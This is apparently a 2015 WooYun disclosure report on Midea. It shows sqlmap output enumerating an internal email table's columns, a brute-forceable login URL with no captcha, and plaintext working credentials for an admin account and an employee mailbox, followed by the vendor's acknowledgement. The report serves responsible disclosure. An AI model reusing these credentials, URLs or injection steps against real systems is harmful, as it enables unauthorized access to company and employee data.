| ZF_DEPT                       |
| ZF_DR_BUDGET                  |
| ZF_S011                       |
| ZF_S207                       |
| ZF_S267                       |
| ZF_SUBJECT                    |
+-------------------------------+


涉及大量敏感数据:

user-temp.png


178W.png


详细字段:

[11:16:34] [INFO] fetching columns for table 'BAS_EMAIL' in database 'JD_ERS'
[11:16:34] [INFO] the SQL query used returns 18 entries
[11:16:34] [INFO] resumed: CREATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: CREATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: UPDATEID
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPDATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPDATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: FD_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEQUENCE_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: EMAIL_SUBJECT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_RECEIVER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: OTHER_EMAIL
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_CONTENT
[11:16:34] [INFO] resumed: CLOB
[11:16:34] [INFO] resumed: EMAIL_FORMAT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_SENDER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: IS_BCC
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: PT_ID
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPLOAD_MIP_FLAG
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEND_FLAG
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: CREATEID
[11:16:34] [INFO] resumed: VARCHAR2


QQ截图20151211113845.png


0X02 某站弱口令
漏洞地址:

http://eng.midea.com.cn/AccountManager/Login?ReturnUrl=%2fContract%2fAlterDetails%2f2e47465d-e155-4d9f-9386-72b1b3a155c2


由于无验证码

协同管理外部平台.png


可爆破:

13800000000-123456.png


成功登录:

13800000000-123456登录成功.png


没想到还是管理员
泄露公司敏感数据:

200多用户.png


合同台账.png


另外被忽略的漏洞

 WooYun: 美的某员工邮箱弱口令


yangyt Midea123
可泄露公司敏感文件,通讯录等

邮箱登录.png


内部文件.png


内部文件2.png


电话-邮箱-职位等.png


漏洞证明:

如上
昨天提交的

http://www.wooyun.org/bugs/wooyun-2015-0160269/trace/b03134ca0952158157208aef0185ff81

未通过 ,但是漏洞并未修复,请修复后公开

修复方案:

认真对待
漏洞打包提交,20rank不过分吧 谢谢

版权声明:转载请注明来源 心云@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-11 17:39

厂商回复:

三发大礼包收下了,谢谢!

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-11 18:16 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    @midea.com 收下了要修复哦 有米有小礼物呀 挖洞不容易T_T